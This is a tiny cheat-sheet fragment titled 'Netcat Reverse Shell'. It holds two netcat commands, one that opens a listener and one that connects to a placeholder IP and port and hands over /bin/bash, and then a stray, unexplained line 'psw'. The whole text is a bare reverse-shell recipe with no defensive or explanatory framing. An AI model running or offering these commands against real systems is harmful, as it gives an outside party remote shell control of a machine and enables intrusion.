Netcat Reverse Shell

nc -l -p <port>

nc <ip> <port> –e /bin/bash 
psw